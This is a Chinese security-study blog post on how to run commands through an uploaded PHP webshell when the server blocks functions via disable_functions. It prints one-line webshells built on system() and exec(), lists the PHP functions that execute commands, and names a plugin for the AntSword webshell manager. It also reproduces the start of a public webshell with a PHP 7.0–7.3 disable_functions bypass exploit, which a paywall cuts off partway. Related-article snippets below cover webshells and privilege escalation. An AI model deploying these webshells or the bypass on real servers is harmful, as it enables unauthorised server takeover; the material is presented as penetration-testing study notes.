WebShell命令执行限制(解决方案)

最新推荐文章于 2023-08-17 20:17:58 发布
原创 最新推荐文章于 2023-08-17 20:17:58 发布 · 3.2k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #php #webshell

本文介绍了在服务器禁用了特定PHP函数的情况下,如何利用未禁用的函数或特殊技巧执行命令的方法。包括寻找未禁用的命令执行函数、使用蚁剑插件尝试绕过以及通过GitHub上提供的代码实现绕过。

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各种注入
  7. SQL注入(3)——SQLMAP
  8. SQL注入(4)——实战SQL注入拿webshell
  9. Vulnhub靶机渗透之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上传漏洞
  12. 文件上传绕过
  13. 文件包含漏洞
  14. Vulnhub靶机渗透之zico2
  15. 命令执行漏洞
  16. 逻辑漏洞(越权访问和支付漏洞)
  17. 网站后台安全
  18. weevely的使用及免杀(Linux中的菜刀)
  19. MSF(1)——一次完整的渗透流程

介绍

在对某网站的渗透过程中,经常会遇到在上传了WebShell后,却无法执行命令的情况,在蚁剑中如下所示
在这里插入图片描述
像这种情况,一般都是服务器的管理人员禁用了命令执行函数

在WebShell中经常使用system()函数执行系统命令,但如果服务器管理人员在php.ini的disabled_function中禁用了该函数,则无法使用该函数。

有一个叫php.ini的文件是php的配置文件,里面有一个disable_functions的选项,里面可以定义php禁用的函数

例如,我如果在disable_functions中填入system,那我的PHP就无法使用system函数执行系统命令
在这里插入图片描述
index.php

<?php system($_REQUEST['cmd']); ?>

此时在网页中访问
在这里插入图片描述
无法使用该函数执行命令。

绕过方法1

想要绕过disable_function,最简单的方法就是找到没有被禁用的命令执行函数

例如,服务器禁止了system函数,但是没有禁止exec函数,则可用exec函数执行命令

<?php 
    exec($_REQUEST['cmd'],$result);
    print_r($result);
 ?>

此时在网页中访问
在这里插入图片描述
这里是php中可执行系统命令的函数

assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open

当你无法执行系统命令时,可去查看被disable_function禁止的函数,然后进行比对,如果发现有服务器遗漏的函数,就可以执行系统命令。

可以上传一个phpinfo到服务器,在里面查看被禁用的函数
在这里插入图片描述

绕过方法2

在蚁剑中有一个插件叫做绕过disable_functions,通过这个插件可以尝试绕过disable_function
在这里插入图片描述
在这里插入图片描述
关于这个教程网上有很多,同时我感觉非常鸡肋,几乎所有网站都禁的死死的。

绕过方法3

在我尝试了各种网络上的方法都失败后。我还是打开了github,看有没有大佬的代码。

发现一个可用的,成功进行了绕过

github地址:https://github.com/cbaker730/php_disabled_functions_webshell

看一下大佬提供的代码
df_webshell.php

<html>
<head></head>

<body>

<h2>Webshell for disabled_functions</h2>

<form method="get">
    <input type="text" name="cmd" id="cmd" onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required><button type="submit">Execute</button>
</form>

</body>
</html>



<?php

# PHP 7.0-7.3 disable_functions bypass PoC (*nix only)
#
# Bug: https://bugs.php.net/bug.php?id=72530
#
# This exploit should work on all PHP 7.0-7.3 versions
# released as of 04/10/2019, specifically:
#
# PHP 7.0 - 7.0.33
# PHP 7.1 - 7.1.31
# PHP 7.2 - 7.2.23
# PHP 7.3 - 7.3.10
#
# Author: https://github.com/mm0r1
# Improvements: https://github.com/cbaker730




if(isset($_REQUEST['cmd'])){
   
   
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        pwn($cmd);
        #system($cmd);
        echo "</pre>";
        die;
}







#pwn("sudo -l > /var/www/html/shop/vqmod/xml/sudo_output.txt");

function pwn($cmd) {
   
   
    global $abc, $helper;

    function str2ptr(&$str, $p = 0, $s = 8
最低0.47元/天 解锁文章
利用WebShell拿Shell技巧
悦分享
08-01 2374
webshell就是以asp、php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php等后门文件与网站服务器WEB目录下正常的网页文件混在一起,可以使用浏览器来访问留下的后门,达到控制网站服务器的目的。shell的含义是取得对服务器某种程度上的操作权限webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。...
apache模块载入命令_发现Webshell无法执行系统命令后的尝试
weixin_39767386的博客
01-09 909
在渗透时一定遇到过拿到了webshell却没法执行系统命令,那八成是能执行系统命令的函数被禁用了,可以写个phpinfo页面看一下,搜索disable_functions。可以看到目标系统禁用了一堆函数,肯定就是防护软件禁用的。好消息就是蚂剑已经集成了绕过插件而且方法还不少,拿来直接用没问题,但我们还是稍微来了解一下原理。接下来就谈谈几种在linux环境下绕过禁用函数执行命令的函数的几种...
[投稿]Webshell命令执行限制及绕过方法
Coisini的博客
06-23 4255
0x00 前言 上传webshell后,执行命令时或许没法执行了,这时我们该分析下原理并想出绕过方式,防守方也必须根据绕过方式想想更强的防御. 0x01 php webshell执行命令原理 php webshell(以下简称webshell)下是怎么执行系统命令的?我们找一个webshell分析下 搜索关键字定位到以下代码 function execute($cfe) { $re...
webshell:Web的命令行
03-10
webshell:Web的命令行
面试题——内网相关(一)
qq_44029310的博客
09-01 1616
自己整理的面试题及答案,本文包括:NTLM本地验证机制,webshellsystem权限无法执行命令怎么办,Windows UAC原理是什么,BypassUAC,RottenPotato(烂土豆MS16-075)提权的原理。
php命令执行绕过,[投稿]Webshell命令执行限制及绕过方法
weixin_30270715的博客
03-17 1030
0x00前言上传webshell后,执行命令时或许没法执行了,这时我们该分析下原理并想出绕过方式,防守方也必须根据绕过方式想想更强的防御.0x01 php webshell执行命令原理php webshell(以下简称webshell)下是怎么执行系统命令的?我们找一个webshell分析下搜索关键字定位到以下代码Defaultfunction execute($cfe) {$res = '';i...
Shell 简单的WEB命令
张小琦的博客专栏
06-04 1657
wget 用于网页或者文件下载的命令 wget URL wget URL1 URL1 -O doloaded.txt   #下载文件为doloaded.txt -o log            #日志信息保存到log文件中 -t 5              #指定重试次数5 --limit-rate 20k  #限制速度 --quota或-Q       #限制下载文件的大小
sqli-labs less2中写入webshell并执行系统命令
最新发布
08-10
| 问题现象 | 解决方案 | |---------|---------| | 写入权限拒绝 | 尝试其他目录:`into outfile '/tmp/shell.php'` | | secure_file_priv限制 | 修改MySQL配置:`my.ini`中设置`secure_file_priv=""` | | 路径错误 ...
虚拟主机封杀webshell提权!!!!!!!!!!
10-01
- **限制WebShell功能**:禁用WebShell查看系统服务信息、执行CMD命令和浏览文件目录的能力。 - **使用FSO组件**:尽管限制了部分功能,但仍然允许使用File System Object (FSO) 等ASP组件。 - **示例软件**:以...
webshell
qq_58970968的博客
03-31 3302
什么是webshell? webshell就是以asp、aspx、 php.jsp, 或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,可以使用浏览器或者webshell管理工具来访问该后门文件,执行相关的系统命令,以达到控制网站服务器的目的。 getshell总结博客:https://note.youdao.com/ynoteshare1/index.html?id=b58d8f4a93c3e5cb0f40ffa5243c11e6&t.
命令注入写webshell
weixin_34082177的博客
03-10 2702
2019独角兽企业重金招聘Python工程师标准>>> ...
浅谈在WEBSHELL下如何运行命令
02-24
随着互联网的发展和互联网用户的快速增长,越来越多的应用都转向B/S结构,因为它是跨平台的、易操作的、方便的、迅速的,这样不论用户使用什么样的操作系统,仅仅需要安装一个浏览器就能享受在线购物、网上支付、看电影、写博客等等各种各样便捷的服务,特别是WEB2.0时代的到来更增添了互联网的
Webshell 及检测绕过
m0_57798134的博客
08-17 811
webshell 概念。
linux 限制shell的指令,【Linux骚操作】shell命令受限制怎么办
weixin_39866857的博客
05-12 555
(命令受限)查看系统环境,找到bin目录echo $PATH进入bin目录cd lscd ..ls -la查看路径下的文件信息尝试将/bin路径加入到系统环境中,PATH变量当前用户只用读权限PATH=/bin当前bash无权限修改环境变量想办法运行/bin/目录下的bash得到修改PATH环境变量的权限利用vi / vim感叹号来执行外部shell命令vi:! /bin/bash发现shell命...
webshell详解
w17791476027的博客
08-03 6517
概念webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门文件,得到一个命令执行环境,以达到控制网站服务器的目的。从字面上来说,webshell单词可以拆成web和shell。其中web即服务器所开放的web服务。Shell即命令执行环境,用户与服务器操作系统交互的接口。
自动利用webshell执行系统命令py脚本
1stPeak's Blog
03-06 820
python2脚本 # -*- coding: utf-8 -*- import urllib.request import threading def cat_flag(): cmd = "cat%20/flag.txt" # 还可用cut -c1- /flag.txt path = "shell.php" passwd = "peak" for i in r...
Linux环境下绕过长度限制写入webshell
Thunderclap的博客
02-23 841
Linux环境下绕过长度限制写入webshell
网络安全——Webshell管理工具
weixin_54055099的博客
08-21 5237
Webshell的应用,中国菜刀、蚁剑、weevely、御剑、Havij的使用
【基础补充】WebShell基础知识
Fighting_hawk的博客
02-28 3463
1. 简单WebShell的本质; 2. 了解大马与小马的特点; 3. 了解常见的一句话木马。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值